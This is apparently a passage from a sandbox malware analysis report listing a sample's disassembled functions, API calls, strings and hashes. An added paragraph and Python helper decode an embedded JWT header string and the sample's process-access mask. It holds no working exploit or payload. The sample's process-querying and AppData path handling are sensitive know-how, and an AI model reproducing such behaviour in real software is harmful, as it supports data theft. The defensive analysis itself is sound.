                          • Part of subcall function 0092A1C0: std::exception::exception.LIBCMT ref: 0092A1FB
                        • std::_Xinvalid_argument.LIBCPMT ref: 009089CD
                          • Part of subcall function 0092A173: std::exception::exception.LIBCMT ref: 0092A188
                          • Part of subcall function 0092A173: std::exception::exception.LIBCMT ref: 0092A1AE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                         • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: std::exception::exception$Xinvalid_argumentstd::_
                        • String ID: invalid string position$string too long
                        • API String ID: 2002836212-4289949731
                        • Opcode ID: 0b87de4008007567a20905866e74eb6639121a16db93b63166674a416776f0f6
                        • Instruction ID: ce0fc88420effdc391baa1ccca5a31be0b53bba87bb00893c68978cc02df6246
                        • Opcode Fuzzy Hash: 0b87de4008007567a20905866e74eb6639121a16db93b63166674a416776f0f6
                        • Instruction Fuzzy Hash: E22194723006519FC720AA5CE840A6BF7A99BE1761B15092BF1D1CB6C1CA71DC41C7A5
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00908883
                          • Part of subcall function 0092A173: std::exception::exception.LIBCMT ref: 0092A188
                          • Part of subcall function 0092A173: std::exception::exception.LIBCMT ref: 0092A1AE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                         • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: std::exception::exception$Xinvalid_argumentstd::_
                        • String ID: vector<T> too long$yxxx$yxxx
                        • API String ID: 2002836212-1517697755
                        • Opcode ID: 8a6775b35c34be6e4003168a2b76671123cdad3d1edbbe82f2a778d216d7a413
                        • Instruction ID: 760ef0ca56a8c4bc18f1a93cf33173b067d6ad7a681cf63ab4821f270c087d95
                        • Opcode Fuzzy Hash: 8a6775b35c34be6e4003168a2b76671123cdad3d1edbbe82f2a778d216d7a413
                        • Instruction Fuzzy Hash: 033195B6F005159FCB08DF58D8916AEBBB6EBC8350F148269E915EB385DB30AD01CB91
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00925922
                          • Part of subcall function 0092A173: std::exception::exception.LIBCMT ref: 0092A188
                          • Part of subcall function 0092A173: std::exception::exception.LIBCMT ref: 0092A1AE
                        • std::_Xinvalid_argument.LIBCPMT ref: 00925935
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                         • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xinvalid_argumentstd::_std::exception::exception
                        • String ID: Sec-WebSocket-Version: 13$string too long
                        • API String ID: 1928653953-3304177573
                        • Opcode ID: 6bca9424554b0ed11a627f15a4433d10ddb149decee5b973d52fd372bc3c75ca
                        • Instruction ID: 34ea214df552817ba731ece7b46dd7865e76a2190f651de3d6633e177fa20db4
                        • Opcode Fuzzy Hash: 6bca9424554b0ed11a627f15a4433d10ddb149decee5b973d52fd372bc3c75ca
                        • Instruction Fuzzy Hash: B2118235308B61CBD7318B2CF80071AB7E5ABD1760F660A9DE0D187699C771D881CBA1
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,0092A430,000000FF), ref: 00923D20
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00923D27
                        • wsprintfA.USER32 ref: 00923D37
                          • Part of subcall function 009271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 009271FE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated dumps and IDA snapshot (hcaresult_0_2_900000_file.jbxd): identical to the list given for the earlier entries
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                        • String ID: %dx%d
                        • API String ID: 1695172769-2206825331
                        • Opcode ID: 2a5242636971396fbebc2c04d4305ee0c2d047b6fc5e508f8c8037c5ddaa406d
                        • Instruction ID: 08897ca2ac756a68c930b6d0f2292d921d57a7a4a1881ba6b849e1734a4d2923
                        • Opcode Fuzzy Hash: 2a5242636971396fbebc2c04d4305ee0c2d047b6fc5e508f8c8037c5ddaa406d
                        • Instruction Fuzzy Hash: D6018071644714BBE7145B54EC4AF6EBB68FB45B61F200115FA05972D0DBB42900CBA2
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00908737
                          • Part of subcall function 0092A173: std::exception::exception.LIBCMT ref: 0092A188
                          • Part of subcall function 0092A173: std::exception::exception.LIBCMT ref: 0092A1AE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated dumps and IDA snapshot (hcaresult_0_2_900000_file.jbxd): identical to the list given for the earlier entries
                        Yara matches
                        Similarity
                        • API ID: std::exception::exception$Xinvalid_argumentstd::_
                        • String ID: vector<T> too long$yxxx$yxxx
                        • API String ID: 2002836212-1517697755
                        • Opcode ID: 5f80ca7d90462895d9a205121b72ccd1a6cc46edc1bb6733eda814e958b3da9c
                        • Instruction ID: 563c3c089a96753635316d91679ac939a206fbf987841c373144c0569af97664
                        • Opcode Fuzzy Hash: 5f80ca7d90462895d9a205121b72ccd1a6cc46edc1bb6733eda814e958b3da9c
                        • Instruction Fuzzy Hash: A8F09027B040320FC314643D9D8445FA94A57E579033AD765E89AEF29DDC70EC8295D5
                        APIs
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0091E544
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091E573
                        • lstrcat.KERNEL32(?,00000000), ref: 0091E581
                        • lstrcat.KERNEL32(?,015EEE30), ref: 0091E59C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated dumps and IDA snapshot (hcaresult_0_2_900000_file.jbxd): identical to the list given for the earlier entries
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FolderPathlstrcpy
                        • String ID:
                        • API String ID: 818526691-0
                        • Opcode ID: d007526e30dcd4661310a4b40feea26865d6a7f6ad47bb5df34a63cda2c74e5f
                        • Instruction ID: e7a129a947737a5685ba95dd458482e090810bef0935cc8b31437014a83997e9
                        • Opcode Fuzzy Hash: d007526e30dcd4661310a4b40feea26865d6a7f6ad47bb5df34a63cda2c74e5f
                        • Instruction Fuzzy Hash: C451C7B5B1020CAFCB55EB54ED46FEE337DEBC8300F540458B91697291EE70AE848BA1
                        APIs
                        Strings
                        • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00921FDF, 00921FF5, 009220B7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated dumps and IDA snapshot (hcaresult_0_2_900000_file.jbxd): identical to the list given for the earlier entries
                        Yara matches
                        Similarity
                        • API ID: strlen
                        • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                        • API String ID: 39653677-4138519520
                        • Opcode ID: 23894e501dece0d2348a70889898f24d3e458ccfbd2784cd7fe6f8a5408f4d96
                        • Instruction ID: 493de8624b2b666b7ef1e9fa11e6205d0755418c5b5994615d93de1e2c843ae5
                        • Opcode Fuzzy Hash: 23894e501dece0d2348a70889898f24d3e458ccfbd2784cd7fe6f8a5408f4d96
                        • Instruction Fuzzy Hash: 39219235590199AFD720FF35E4447EDF36BEF80361F844456C8190B249E336291ADB96
                        APIs
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0091EBB4
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091EBE3
                        • lstrcat.KERNEL32(?,00000000), ref: 0091EBF1
                        • lstrcat.KERNEL32(?,015F0108), ref: 0091EC0C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated dumps and IDA snapshot (hcaresult_0_2_900000_file.jbxd): identical to the list given for the earlier entries
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FolderPathlstrcpy
                        • String ID:
                        • API String ID: 818526691-0
                        • Opcode ID: fdcbfc48848d5a7911094e28b20c7ae579e308a66504ec26266f00c813061030
                        • Instruction ID: 4f7386864e25dbd12fffdcf5f03f6d6b86b12cf2d181906257e37ce42fd1fc92
                        • Opcode Fuzzy Hash: fdcbfc48848d5a7911094e28b20c7ae579e308a66504ec26266f00c813061030
                        • Instruction Fuzzy Hash: CA318971B1011C9FCB65EF68DD45BED77B8BF88300F1044A8BA16972D1DE70AE848B91
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0092A3D0,000000FF), ref: 00922B8F
                        • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00922B96
                        • GetLocalTime.KERNEL32(?,?,00000000,0092A3D0,000000FF), ref: 00922BA2
                        • wsprintfA.USER32 ref: 00922BCE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated dumps and IDA snapshot (hcaresult_0_2_900000_file.jbxd): identical to the list given for the earlier entries
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                        • String ID:
                        • API String ID: 377395780-0
                        • Opcode ID: 085e2ba383c5aba977e898a7b984879a33ee4b5458cc23522ab8256c1a899548
                        • Instruction ID: 0c9d58b9b0c6694c42ac44b270ef0cefb251a7f158df7264eda4a9e8a60c377b
                        • Opcode Fuzzy Hash: 085e2ba383c5aba977e898a7b984879a33ee4b5458cc23522ab8256c1a899548
                        • Instruction Fuzzy Hash: D80140B2904628ABCB149BC9DD45FBEB7BCFB4CB11F10011AF645A2280EBB85540C7B1
                        APIs
                        • OpenProcess.KERNEL32(00000410,00000000), ref: 00924492
                        • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 009244AD
                        • CloseHandle.KERNEL32(00000000), ref: 009244B4
                        • lstrcpy.KERNEL32(00000000,?), ref: 009244E7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated dumps and IDA snapshot (hcaresult_0_2_900000_file.jbxd): identical to the list given for the earlier entries
                        Yara matches
                        Similarity
                        • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                        • String ID:
                        • API String ID: 4028989146-0
                        • Opcode ID: 34a2feba54a04e211f4fcb6f3c1894d2bc4beb04adf59c9008e64bcc7c500bb9
                        • Instruction ID: 446b541b7e4f039a8f33e86764f54541ffcfa0490bcf734798e5b28d29997041
                        • Opcode Fuzzy Hash: 34a2feba54a04e211f4fcb6f3c1894d2bc4beb04adf59c9008e64bcc7c500bb9
                        • Instruction Fuzzy Hash: 12F0F6B09016256FE720BB74AC4DBEABAECAF14304F1005A1FA89D7190DFF09C808B90
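Two of the entries above carry constants worth decoding by hand. The hex string under Strings at xrefs 00921FDF, 00921FF5 and 009220B7 (the entry whose only recorded API is strlen) is plain ASCII; read as unpadded base64url it yields the JSON object { "typ": "JWT", "alg": "EdDSA" }, i.e. a JOSE header, so the function is comparing data against a fixed token prefix. The OpenProcess call at 00924492 passes 0x410, which is PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, exactly the rights GetModuleFileNameExA needs and nothing more, consistent with the "Searches for specific processes" signature in the summary; and the 0x1A passed to SHGetFolderPathA at 0091E544 and 0091EBB4 is CSIDL_APPDATA, so those two functions build paths under the user's AppData directory. The Python below is an added helper, not part of the Joe Sandbox report or the sample: the hex string and the 0x410 mask are the only inputs taken from the page, the PROCESS_* bit names are the documented winnt.h values, and the "is this a JWT header" test is this example's own heuristic.

```python
import base64
import binascii
import json

# Value copied from the "Strings" entry of this report (xrefs 00921FDF, 00921FF5,
# 009220B7). It is the only string input taken from the page.
REPORT_HEX = (
    "65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 "
    "62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30"
)

# dwDesiredAccess passed to OpenProcess at 00924492 in the report.
REPORT_OPENPROCESS_MASK = 0x410

# Documented Win32 PROCESS_* access bits (winnt.h); the table itself is this example's.
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}


def hex_dump_to_ascii(hex_dump: str) -> str:
    """Turn the report's space-separated hex bytes into text (strict ASCII)."""
    return bytes.fromhex(hex_dump.replace(" ", "")).decode("ascii")


def b64url_decode_lenient(segment: str) -> bytes:
    """Decode base64 or base64url that may lack '=' padding, as JWT segments do."""
    s = segment.strip().replace("-", "+").replace("_", "/")
    s += "=" * (-len(s) % 4)
    return base64.b64decode(s, validate=True)


def decode_report_string(hex_dump: str) -> dict:
    """hex -> ASCII -> base64url -> JSON; reports whether the result looks like a JWT header."""
    ascii_text = hex_dump_to_ascii(hex_dump)
    try:
        obj = json.loads(b64url_decode_lenient(ascii_text).decode("utf-8"))
    except (binascii.Error, UnicodeDecodeError, json.JSONDecodeError):
        return {"ascii": ascii_text, "decoded": None, "is_jwt_header": False}
    # Heuristic of this example: a JOSE header object carrying typ=JWT and an alg.
    is_jwt = isinstance(obj, dict) and obj.get("typ") == "JWT" and "alg" in obj
    return {"ascii": ascii_text, "decoded": obj, "is_jwt_header": is_jwt}


def decode_access_mask(mask: int, table=PROCESS_RIGHTS) -> list:
    """Expand an OpenProcess access mask into named rights, keeping unknown bits as hex."""
    names = [name for bit, name in sorted(table.items()) if mask & bit]
    unknown = mask & ~sum(table)
    if unknown:
        names.append(f"0x{unknown:X}")
    return names


if __name__ == "__main__":
    result = decode_report_string(REPORT_HEX)
    print(result["ascii"])
    print(result["decoded"])
    print(" | ".join(decode_access_mask(REPORT_OPENPROCESS_MASK)))
```

The decoder pads the base64url text itself because JWT segments are stored without '=' characters; a strict base64 decode of the raw 43-character string would fail. Any hex string from a report that does not decode to JSON comes back with decoded set to None rather than raising, so the helper can be run over a batch of extracted strings.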
                        APIs
                        • __getptd.LIBCMT ref: 00928FDD
                          • Part of subcall function 009287FF: __amsg_exit.LIBCMT ref: 0092880F
                        • __getptd.LIBCMT ref: 00928FF4
                        • __amsg_exit.LIBCMT ref: 00929002
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00929026
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated dumps and IDA snapshot (hcaresult_0_2_900000_file.jbxd): identical to the list given for the earlier entries
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                        • String ID:
                        • API String ID: 300741435-0
                        • Opcode ID: fd0a456d47ad95de30430b2cdf5ea43f2bda2eb63692fd97ec388d4a18dd5304
                        • Instruction ID: 89b4814dd62310e1254633cc9cb09e2f6e379a7f0bd0d7427831b178a351075b
                        • Opcode Fuzzy Hash: fd0a456d47ad95de30430b2cdf5ea43f2bda2eb63692fd97ec388d4a18dd5304
                        • Instruction Fuzzy Hash: 32F0BB3294D7349BD760BBB87807B5E73E06F40724F254109F444B71DADF645900EA99
                        APIs
                        • lstrlen.KERNEL32(------,00905BEB), ref: 0092731B
                        • lstrcpy.KERNEL32(00000000), ref: 0092733F
                        • lstrcat.KERNEL32(?,------), ref: 00927349
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated dumps and IDA snapshot (hcaresult_0_2_900000_file.jbxd): identical to the list given for the earlier entries
                        Yara matches
                        Similarity
                        • API ID: lstrcatlstrcpylstrlen
                        • String ID: ------
                        • API String ID: 3050337572-882505780
                        • Opcode ID: c9aff42189b37a652966da0b11c81c131280d9a4f913c429ae892c54c8407a61
                        • Instruction ID: a234614cc719a8df94e035250b369fb8318b834d717b92ceb95cde168024ef1e
                        • Opcode Fuzzy Hash: c9aff42189b37a652966da0b11c81c131280d9a4f913c429ae892c54c8407a61
                        • Instruction Fuzzy Hash: AAF0C9745117129FDB249F75E99892ABAF9EF85701328882DA89AD7218EB34D840DB10
                        APIs
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 00901557
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 00901579
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 0090159B
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 009015FF
                        • lstrcpy.KERNEL32(00000000,?), ref: 00913422
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091344B
                        • lstrcpy.KERNEL32(00000000,?), ref: 00913471
                        • lstrcpy.KERNEL32(00000000,?), ref: 00913497
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID:
                        • API String ID: 3722407311-0
                        • Opcode ID: 1f065c4dde7d30123fa4c78453843d0a1e0e74febe798c3b87438fbd5cf49f74
                        • Instruction ID: 9785c59595664a6090fb3ec32edc5275725cf42f686549b67b77c8c43aab505d
                        • Opcode Fuzzy Hash: 1f065c4dde7d30123fa4c78453843d0a1e0e74febe798c3b87438fbd5cf49f74
                        • Instruction Fuzzy Hash: E312BB70B112059FDB18CF19C558B69B7F9AF44718B29C0ADE8199B3A2D772DD82CF40
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00917C94
                        • std::_Xinvalid_argument.LIBCPMT ref: 00917CAF
                          • Part of subcall function 00917D40: std::_Xinvalid_argument.LIBCPMT ref: 00917D58
                          • Part of subcall function 00917D40: std::_Xinvalid_argument.LIBCPMT ref: 00917D76
                          • Part of subcall function 00917D40: std::_Xinvalid_argument.LIBCPMT ref: 00917D91
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xinvalid_argumentstd::_
                        • String ID: string too long
                        • API String ID: 909987262-2556327735
                        • Opcode ID: 40dcd8e10cc6e150b61a82f44e0426e7b17cd7bf928ce744284922ad6ce3cd82
                        • Instruction ID: ab26430c5f861fd8419f5ba0dca5183470785bb28d3ccb38b2ac1495bf28f881
                        • Opcode Fuzzy Hash: 40dcd8e10cc6e150b61a82f44e0426e7b17cd7bf928ce744284922ad6ce3cd82
                        • Instruction Fuzzy Hash: 8B31CD7230861A4BD724DDDCE880AAAF7F9DF91750B20492AF58287741D7719DC187E4
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,?), ref: 00906F74
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00906F7B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
